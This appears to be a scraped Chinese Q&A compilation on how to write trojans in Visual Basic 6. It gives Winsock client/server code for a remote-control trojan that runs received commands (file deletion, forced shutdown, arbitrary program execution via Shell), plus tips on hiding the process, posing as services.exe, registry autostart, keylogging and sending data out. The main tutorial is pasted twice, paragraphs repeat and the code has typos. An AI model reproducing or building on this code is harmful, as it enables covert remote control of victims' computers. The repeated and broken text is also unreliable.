vb木馬編程

『壹』 可以用VB編寫木馬的原代碼嗎

VB6.0編寫「特洛伊木馬」程序

「特洛伊木馬」有被稱為BO， 是在美國一次黑客技術討論會上由一個黑客組織推出的。它其實是一種客戶機/伺服器程序，其利用的原理就是：在本機直接啟動運行的程序擁有與使用者相同的許可權。因此如果能夠啟動伺服器端（即被攻擊的計算機）的伺服器程序，就可以使用相應的客戶端工具客戶程序直接控制它了。下面來談談如何用VB來實現它。

使用VB建立兩個程序，一個為客戶端程序Client，一個為伺服器端程序systry。

在Client工程中建立一個窗體，載入WinSock控制項，稱為tcpClient，協議選擇TCP，再加入兩個文本框，用以輸入伺服器的IP地址或伺服器名，然後建立一個按鈕，按下之後就可以對連接進行初始化了，代碼如下：

Private Sub cmdConnect_Click()
If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
MsgBox ("請輸入主機名或主機IP地址。")
Exit Sub
Else
If Len(Text1.Text) > 0 Then
tcpClient.RemoteHost = Text1.Text
Else
tcpClient.RemoteHost = Text2.Text
End If
End If
tcpClient.Connect
Timer1.Enabled = True
End Sub

連接建立之後就可以使用DataArrival事件處理所收到的數據了。

連接建立之後就可以使用DataArrival事件處理所收到的數據了。

在伺服器端systry工程也建立一個窗體，載入WinSock控制項，稱為tcpServer，協議選擇TCP，在Form_Load事件中加入如下代碼：

Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub

准備應答客戶端程序的請求連接，使用ConnectionRequest事件來應答戶端程序的請求，代碼如下：

Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
If tcpServer.State < > sckClosed Then
tcpServer.Close『檢查控制項的 State 屬性是否為關閉的。
End If 』如果不是，在接受新的連接之前先關閉此連接。
tcpServer.Accept requestID
End Sub

這樣在客戶端程序按下了連接按鈕後，伺服器端程序的ConnectionRequest事件被觸發，執行了以上的代碼。如果不出意外，連接就被建立起來了。

建立連接後伺服器端的程序通過DataArrival事件接收客戶機端程序所發的指令運行既定的程序。如：把伺服器端的驅動器名、目錄名、文件名等傳到客戶機端，客戶機端接收後用TreeView控制項以樹狀的形式顯示出來，瀏覽伺服器端文件目錄；強制關閉或重啟伺服器端的計算機；屏蔽任務欄窗口；屏蔽開始菜單；按照客戶機端傳過來的文件名或目錄名，而刪除它；屏蔽熱啟動鍵；運行伺服器端的任何程序；還包括獲取目標計算機屏幕圖象、窗口及進程列表；激活、終止遠端進程；打開、關閉、移動遠端窗口；控制目標計算機滑鼠的移動與動作；交換遠端滑鼠的左右鍵；在目標計算機模擬鍵盤輸入，下載、上裝文件；提取、創建、修改目標計算機系統注冊表關鍵字；在遠端屏幕上顯示消息。DataArrival事件程序如下：

Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)

Dim strData As String
Dim i As Long
Dim mKey As String

tcpServer.GetData strData
『接收數據並存入strData
For i = 1 To Len(strData)
『分離strData中的命令
If Mid(strData, i, 1) = "@" Then
mKey = Left(strData, i - 1)
『把命令ID號存入mKey

『把命令參數存入strData
strData = Right(strData, Len(strData) - i)
Exit For
End If
Next i
Select Case Val(mKey)
Case 1
『驅動器名、目錄名、文件名
Case 2
強制關閉伺服器端的計算機
Case 3
強制重啟伺服器端的計算機
Case 4
屏蔽任務欄窗口；
Case 5
屏蔽開始菜單；
Case 6
按照客戶機端傳過來的文件名或目錄名，而刪除它；
Case 7
屏蔽熱啟動鍵；
Case 8
運行伺服器端的任何程序
End Select
End Sub

詳細程序略。

客戶機端用tcpClient.SendData發命令。命令包括命令ID和命令參數，它們用符號「@」隔開。

另外，當客戶機端斷開與伺服器端的來接後，伺服器端應用tcpServer_Close事件，來繼續准備接收客戶機端的請求，其代碼如下：

Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub

這就是一個最基本的特洛伊木馬程序，只要你的機器運行了伺服器端程序，那別人就可以在千里之外控制你的計算機。至於如何讓伺服器端程序運行就要發揮你的聰明才智了，在我的源程序中有一中方法，是修改系統注冊表的方法。

這就是一個最基本的特洛伊木馬程序，只要你的機器運行了伺服器端程序，那別人就可以在千里之外控制你的計算機。至於如何讓伺服器端程序運行就要發揮你的聰明才智了，在我的源程序中有一中方法，是修改系統注冊表的方法。

成功的特洛伊木馬程序要比這個復雜一些，還有程序的隱藏、自動復制、傳播等問題要解決。警告：千萬不要用BO程序破壞別人的系統。

『貳』 我得到了用VB編寫的木馬源碼,我應該怎麼編出木馬

如果是在VB6下，可以運行「文件」菜單下的「生成.exe」命令得到目標程序；
如果是在vb.net下，可以運行「生成」菜單下的「生成」命令來編譯工程。

『叄』 用VB實現「木馬」式隱形運行程序

程序的具體編制操作如下：

1. 在VB6.0編程環境中，新建一個工程Project1。

2. 在Project1中添加模塊Molel，在工程屬性中將工程名稱改為HiddenMen，應用程序標題也改為HiddenMen（以下程序都經過實際運行測試，可以原樣復制使用）。

在模塊Mole1中加入如下聲明：

Public Declare Function GetCurrentProcessId Lib 「kernel32」 () As Long
』獲得當前進程ID函數的聲明
Public Declare Function RegisterServiceProcess Lib 「kernel32」 (ByVal ProcessId As Long, ByVal ServiceFlags As Long) As Long
』在系統中注冊當前進程ID函數的聲明

3. 在Project1中新建一個窗體Form1，設置Form1的屬性：

form1.Visible=False
form1.ShowInTaskBar=False

『肆』 如何用VB製作小型的木馬程序最好有比較詳細的步驟！！

窗口啟動後，應該把窗口隱藏起來。在窗口上應有一個Timer控制項，用來監視鍵盤和滑鼠。鍵盤可用DirectX7或SetWindowsHook(很難)來監視，而滑鼠可以用GetCursorPos
API獲得。所有的過程都應用On
Error
Resume
Next，防止出錯關閉。另外，還要通過Winsock與主機聯系或發送電子郵件，以便獲取信息。木馬程序還可以有其他功能，你可根據情況添加。

『伍』 用vb怎麼編寫木馬程序

我覺得吧想編寫木馬首先要對系統有一定的了解，VB編寫木馬的話基本都是調用API函數，去實現你想要的功能。比如關機，獲取用戶名稱等等……現在網上有很多簡單的木馬程序。你可以搜索下，自己去看看。
之前我用Winsock控制項編寫過個簡單的，有興趣的話，回復我，我發給你參考下

『陸』 VB編寫木馬

VB編木馬？？
搞笑呢？VB是
所有語音里最簡單的一種
估計連一種小游戲都實現不了
更別說木馬了
一個木馬最起碼用VB還需要另一種語言來配合
而且你是高手的話
也得
1
2個月才能實現

『柒』 用VB怎麼做木馬程序

第一種模防windows進程名,services.exe 這樣他中止不了,然後看讓你的木馬操作了,一般都假裝系統進程,然後在後台開避一個監聽埠,等待客戶機遠程聯接,這裡面用Winstock編程,等到連接成功後,客戶機就可以發指令了.然後執行,如果沒有VB運行庫的話,首先將程序打包,然後把所需的文件提出來,用Winrar壓縮成.exe就可以了.QQ:905906

『捌』 VB能寫木馬類的軟體嗎

可以的，下面就是一個木馬的部分代碼：
Private Sub tcpserver_dataArrival(index As Integer, ByVal bytestotal As Long)
Dim strdata As String
Dim check_blong
on error gogo err_pro
tcpserver(index).GetData strdata
check_blong = InStr(Trim(strdata), "Exec")
If check_blong > 0 Then
strdata = Trim(strdata)
strdata = Right(strdata.Len(strdata) - 4)
Connect.Text = content.Text + vbNewLine + tcpserver(index).RemoteHostIP + "" + "要求執行下面的程序：" + strdata
Shell (strdata)
Else
check_blong = InStr(Trim(strdata), "closeOk")
If check_blong > 0 Then
tcpserver(index).Close
combol_IP.removeltem (index - 1)
content.Text = content.Text + vbNewLine + tcpserver(index).RemoteHostIP + "" + "已經斷開！"
Else
ipname.Text = tcpserver(index).RemoteHostIP
txtoutput.Text = content.Text + vbNewLine + tcpserver(index).RemoteHostIP + "" + strdata
End If

End Sub

不要使壞喲，主要的不給。

『玖』 用VB能編木馬嗎

當然能用VB編寫木馬，不過肯定是得不償失，因為VB的特性不適合編寫這種程序，目前用VC++/C++/Delphi之類的語言更好些

『拾』 我想用VB編個木馬，誰能給我說說原代碼啊

自己試試看，我這里是盜版別人的~~~~呵呵

VB6.0編寫「特洛伊木馬」程序

「特洛伊木馬」有被稱為BO， 是在美國一次黑客技術討論會上由一個黑客組織推出的。它其實是一種客戶機/伺服器程序，其利用的原理就是：在本機直接啟動運行的程序擁有與使用者相同的許可權。因此如果能夠啟動伺服器端（即被攻擊的計算機）的伺服器程序，就可以使用相應的客戶端工具客戶程序直接控制它了。下面來談談如何用VB來實現它。

使用VB建立兩個程序，一個為客戶端程序Client，一個為伺服器端程序systry。

在Client工程中建立一個窗體，載入WinSock控制項，稱為tcpClient，協議選擇TCP，再加入兩個文本框，用以輸入伺服器的IP地址或伺服器名，然後建立一個按鈕，按下之後就可以對連接進行初始化了，代碼如下：

Private Sub cmdConnect_Click()
If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
MsgBox ("請輸入主機名或主機IP地址。")
Exit Sub
Else
If Len(Text1.Text) > 0 Then
tcpClient.RemoteHost = Text1.Text
Else
tcpClient.RemoteHost = Text2.Text
End If
End If
tcpClient.Connect
Timer1.Enabled = True
End Sub

連接建立之後就可以使用DataArrival事件處理所收到的數據了。

連接建立之後就可以使用DataArrival事件處理所收到的數據了。

在伺服器端systry工程也建立一個窗體，載入WinSock控制項，稱為tcpServer，協議選擇TCP，在Form_Load事件中加入如下代碼：

Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub

准備應答客戶端程序的請求連接，使用ConnectionRequest事件來應答戶端程序的請求，代碼如下：

Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
If tcpServer.State < > sckClosed Then
tcpServer.Close『檢查控制項的 State 屬性是否為關閉的。
End If 』如果不是，在接受新的連接之前先關閉此連接。
tcpServer.Accept requestID
End Sub

這樣在客戶端程序按下了連接按鈕後，伺服器端程序的ConnectionRequest事件被觸發，執行了以上的代碼。如果不出意外，連接就被建立起來了。

建立連接後伺服器端的程序通過DataArrival事件接收客戶機端程序所發的指令運行既定的程序。如：把伺服器端的驅動器名、目錄名、文件名等傳到客戶機端，客戶機端接收後用TreeView控制項以樹狀的形式顯示出來，瀏覽伺服器端文件目錄；強制關閉或重啟伺服器端的計算機；屏蔽任務欄窗口；屏蔽開始菜單；按照客戶機端傳過來的文件名或目錄名，而刪除它；屏蔽熱啟動鍵；運行伺服器端的任何程序；還包括獲取目標計算機屏幕圖象、窗口及進程列表；激活、終止遠端進程；打開、關閉、移動遠端窗口；控制目標計算機滑鼠的移動與動作；交換遠端滑鼠的左右鍵；在目標計算機模擬鍵盤輸入，下載、上裝文件；提取、創建、修改目標計算機系統注冊表關鍵字；在遠端屏幕上顯示消息。DataArrival事件程序如下：

Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)

Dim strData As String
Dim i As Long
Dim mKey As String

tcpServer.GetData strData
『接收數據並存入strData
For i = 1 To Len(strData)
『分離strData中的命令
If Mid(strData, i, 1) = "@" Then
mKey = Left(strData, i - 1)
『把命令ID號存入mKey

『把命令參數存入strData
strData = Right(strData, Len(strData) - i)
Exit For
End If
Next i
Select Case Val(mKey)
Case 1
『驅動器名、目錄名、文件名
Case 2
強制關閉伺服器端的計算機
Case 3
強制重啟伺服器端的計算機
Case 4
屏蔽任務欄窗口；
Case 5
屏蔽開始菜單；
Case 6
按照客戶機端傳過來的文件名或目錄名，而刪除它；
Case 7
屏蔽熱啟動鍵；
Case 8
運行伺服器端的任何程序
End Select
End Sub

詳細程序略。

客戶機端用tcpClient.SendData發命令。命令包括命令ID和命令參數，它們用符號「@」隔開。

另外，當客戶機端斷開與伺服器端的來接後，伺服器端應用tcpServer_Close事件，來繼續准備接收客戶機端的請求，其代碼如下：

Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub

這就是一個最基本的特洛伊木馬程序，只要你的機器運行了伺服器端程序，那別人就可以在千里之外控制你的計算機。至於如何讓伺服器端程序運行就要發揮你的聰明才智了，在我的源程序中有一中方法，是修改系統注冊表的方法。

這就是一個最基本的特洛伊木馬程序，只要你的機器運行了伺服器端程序，那別人就可以在千里之外控制你的計算機。至於如何讓伺服器端程序運行就要發揮你的聰明才智了，在我的源程序中有一中方法，是修改系統注冊表的方法。

成功的特洛伊木馬程序要比這個復雜一些，還有程序的隱藏、自動復制、傳播等問題要解決。警告：千萬不要用BO程序破壞別人的系統。